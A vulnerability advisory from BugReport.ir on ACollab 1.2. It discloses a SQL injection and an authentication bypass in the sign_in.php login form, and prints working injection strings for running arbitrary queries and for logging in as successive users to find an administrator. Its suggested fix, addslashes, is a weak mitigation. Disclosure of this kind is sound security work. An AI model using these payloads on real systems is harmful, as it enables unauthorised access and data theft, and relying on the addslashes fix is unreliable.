##########################www.BugReport.ir##########################################AmnPardaz Security Research Team## Title: ACollab Multiple Vulnerabilities# Vendor: http://www.atutor.ca/acollab# Vulnerable Version: 1.2 (Latest version till now)# Exploitation: Remote with browser# Fix: N/A#######################################################################################################- Description:####################
ACollab as described by its vendor is an accessible,open source,
multi-group, Web-based collaborative
work environment. ACollab is available as a standalone collaborative
work environment that will run on
its own. ACollab is ideal for groups working at a distance developing
documentation, collaborating on
research,or writing joint papers.####################- Vulnerability:####################+--> SQL Injection
All of the parameters are sanitized correctly before being used in
SQL queries else of
the POST parameters 'login'and'password'in the "sign_in.php" page.
These parameters
can be used for injecting arbitrary SQL queries; the 'login'
parameter is single quoted
and the 'password' parameter is single parenthesized, single quoted.+--> Authentication Bypass
The ACollab CMS uses two mechanism for authentication. One for master
admin user which is
based on a hard coded username/password initialized in the
installation process. And a DB-based
authentication forall other users, including the group
administrators which can add/remove/edit
all posts and news and...from forums and first screen of the
website. The second authentication
mechanism can be bypassed.####################- Exploits/PoCs:####################+--> Exploiting The (MySQL) SQL Injection Vulnerability:
Go to the sign in page at "victim.net/ACollab/sign_in.php"and use
the following vectors for injecting
your desired SQL query, namely $Q:- In the Username field (login POST parameter):' or $Q or ''='- In the Password field (password POST parameter):') or $Q or (''='+--> Exploiting The Authentication Bypass Vulnerability:
You can login as anyone of the registered users of ACollab CMS by
providing following vector
as username and nothing as password:'or''='' limit 1 offset 0 -- '
Above vector will log you as the first user according to its member
id order. You can login as other
users, searching for a group administrator account, by following vectors:'or''='' limit 1 offset 0 -- ''or''='' limit 1 offset 1 -- ''or''='' limit 1 offset 2 -- '....####################- Solution:####################
Add the following command
$_POST['login']= addslashes ($_POST['login']);
$_POST['password']= addslashes ($_POST['password']);
at the line 46 of 'sign_in.php'file.####################- Original Advisory:####################
http://www.bugreport.ir/index_72.htm
####################- Credit:####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com